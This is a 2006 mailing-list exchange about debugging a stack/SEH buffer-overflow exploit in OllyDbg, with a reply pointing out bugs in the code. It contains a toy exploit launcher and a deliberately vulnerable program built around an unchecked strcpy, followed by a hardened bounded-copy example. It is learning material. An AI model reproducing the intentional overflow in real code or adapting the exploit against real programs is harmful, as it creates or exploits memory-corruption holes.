I've never seen anyone use this method for filling a buffer, but:
I don't see the variable "ret" declared anywhere in your code. I just
see it used in the call to memcpy.
sizeof(payload) might not be the best way to get the string length of
the payload. It may be safer to use strnlen. There is no guarantee that
sizeof(char[84]) will return the length of the string as opposed to
sizeof(char).
You also seem to be misusing your `ptr` variable.
I recommend you read "Smashing the Stack for Fun and Profit":
http://www.phrack.org/show.php?p=49&a=14
The Jabberwock
http://www.tenebrous.com/
laphoo_at_gmail.com wrote:
> Hello, I would like to know a way to debug a vulnerable program, where I am overwriting the SEH handler with my address. I have OllyDbg as just-in-time debugger. If my exploit buffer reaches the pointer to the next SEH record, nothing happens. Now I was trying to put breakpoint instructions (0xcc) as a fake pointer, but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something?
>
> /* cl expl.c (Visual C++ 6.0) */
> #include <stdio.h>
> #include <string.h>
> int main (void)
> {
> char *app[3];
> char payload[84];
> unsigned int ptr = 0xcccccccc;
> memset(payload, 0x00, sizeof payload);
> memset(payload, 0x41, 80);
> memcpy(payload+80, &ret, sizeof (int));
> app[0] = "vuln.exe";
> app[1] = payload;
> app[2] = NULL;
> execve(app[0], app, NULL);
> return 0;
> }
>
>
> /* vuln.c */
> #include <stdio.h>
> #include <string.h>
> int main (int argc, char *argv[])
> {
> char string[32];
> if (argc > 2)
> {
> printf("Usage: %s <string>\n", argv[0]);
> return 0;
> }
> strcpy(string, argv[1]);
> printf("%s", string);
> return 0;
> }
>
> Environment is Windows.XP.SP.2
>
> I am sorry for my bad English.
>
> Regards,
> -- Laphoo
>
>
Received on Mar 20 2006
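As an added example (not code from the thread), the sizeof pitfall the reply describes, measured on the same 80-byte fill as expl.c, and a bounded replacement for the unchecked strcpy() in vuln.c; BUF_SIZE and the function names are my own assumptions.

```c
#include <string.h>
#include <stddef.h>

/* Added example, not code from the thread: why sizeof is not a string
   length, plus a bounded replacement for the strcpy() in vuln.c.
   BUF_SIZE mirrors vuln.c's 32-byte 'string' array (an assumption). */
#define BUF_SIZE 32

/* Length of the string in s without reading past max bytes;
   returns max if no terminating NUL is found (memchr is standard C). */
static size_t bounded_len(const char *s, size_t max) {
    const char *nul = memchr(s, '\0', max);
    return nul ? (size_t)(nul - s) : max;
}

/* Fills an 84-byte buffer with 80 'A's exactly as expl.c does and returns
   what each measure reports: which = 0 -> sizeof the array (declared size),
   1 -> sizeof a pointer to it (pointer size), 2 -> actual string length. */
size_t payload_measure(int which) {
    char payload[84];
    const char *p = payload;
    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);
    switch (which) {
    case 0:  return sizeof payload;                       /* 84 */
    case 1:  return sizeof p;                             /* sizeof(char *) */
    default: return bounded_len(payload, sizeof payload); /* 80 */
    }
}

/* Hardened form of vuln.c's strcpy(string, argv[1]): copy only if src and
   its NUL fit in dst. Returns 0 on success, -1 if the input would overflow
   the buffer; dst is left untouched on failure. */
int copy_arg(char *dst, size_t dst_size, const char *src) {
    size_t n = bounded_len(src, dst_size);
    if (n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}
```

With vuln.c's 32-byte buffer, a 31-character argument is the longest that copy_arg accepts; the 80-byte payload from expl.c is rejected instead of being written past the end of the array.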